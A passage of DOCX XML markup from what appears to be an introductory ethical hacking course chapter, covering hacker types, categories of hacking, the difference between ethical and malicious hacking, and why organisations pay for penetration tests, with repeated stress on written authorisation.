          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Real-world analogy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A locksmith who tests your door lock with your permission, finds it weak, and tells you to replace it, is providing a security service. A stranger who picks the same lock without permission is committing burglary — even though the lock-picking skill used is exactly the same. Ethical hacking works the same way.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pP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2924"/>
        <w:gridCol w:w="6822"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>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Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6822"/>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What it covers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>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Network hacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Attacking routers, firewalls, switches and network protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>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Web application hacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Attacks like SQL Injection and XSS against websites and APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>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Wireless hacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Capturing Wi-Fi handshakes, rogue access points</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>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Social engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Manipulating people — phishing, pretexting, baiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>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System / OS hacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Exploiting operating-system flaws, privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>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Password attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Cracking, brute-forcing or stealing credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:left w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:bottom w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:right w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FBEAEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A33A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✗ Common Mistake</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Beginners sometimes assume a tool itself is “illegal” or “legal”. No publicly available security tool is illegal to possess in most jurisdictions — what is illegal is using it against a system without authorisation. Always separate the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">tool</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> from the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">authorisation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Types of Hackers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hackers are usually classified by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">intent and authorisation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, not by technical skill level.</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2144"/>
        <w:gridCol w:w="5165"/>
        <w:gridCol w:w="2437"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5165"/>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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Authorisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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White Hat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="516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Security professionals who test systems with written permission and report findings responsibly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Always authorised</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Black Hat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="516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Malicious attackers who break into systems illegally for profit, theft or damage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Never authorised</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Grey Hat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="516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Test systems without authorisation but without malicious intent, often reporting flaws unasked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Not authorised — still illegal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Hacktivists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="516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Motivated by political or social causes; deface sites or leak data to make a statement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Not authorised</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Script Kiddies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="516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Inexperienced attackers using ready-made tools without understanding how they work</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Not authorised</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Nation-State Actors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="516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Government-backed groups carrying out espionage, sabotage or cyber warfare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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State-sanctioned, not target-sanctioned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:left w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:bottom w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:right w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F3ECF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A3D9A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">↔ Grey Hat vs White Hat</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The difference is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> skill or intention to help — it is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">written authorisation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. A grey hat who finds and reports a bug for free, with good intentions, is still breaking the law the moment they access a system without permission. A white hat only ever touches systems they have signed authorisation to test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Ethical Hacking vs Malicious Hacking</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1949"/>
        <w:gridCol w:w="3898"/>
        <w:gridCol w:w="3899"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Ethical Hacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3899"/>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Malicious Hacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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Authorisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Written permission obtained before testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="389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No authorisation — illegal from the start</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Scope, timeline and rules agreed in advance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3899"/>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No defined scope; anything is a target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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Reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Findings reported confidentially to the client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="389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Exploits used for theft, ransom or sabotage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Strengthen defences</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3899"/>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Personal, financial or political gain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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Legal status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Governed by NDA and legal contracts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="389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Punishable under the IT Act 2000 and IPC/BNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 How Ethical Hacking Strengthens Security, and Why Organisations Pay for It</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Why it matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulates real attacks, so organisations see genuine exposure instead of theoretical risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Finds gaps before criminals do — misconfigurations, weak passwords, unpatched software.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Validates whether existing controls (firewalls, monitoring, SOC) actually detect and stop an intrusion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Produces a risk-ranked report so teams fix the most dangerous issues first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Supports compliance with standards such as ISO 27001, PCI-DSS and the IT Act 2000.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Why companies pay for penetration tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cost of a breach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — recovering from a real breach (downtime, legal fees, ransom, reputational loss) is usually far more expensive than a planned test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Regulatory mandate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — standards like PCI-DSS, and regulators such as RBI/SEBI, often require periodic third-party testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reputation protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
